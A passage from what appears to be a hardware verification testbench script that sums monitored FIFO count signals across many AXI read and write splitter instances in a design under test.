counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split107.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split108.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split109.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split11.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split110.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split111.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split112.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split113.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split114.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split115.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split12.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split13.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split14.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split15.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.ar_fifo.count")
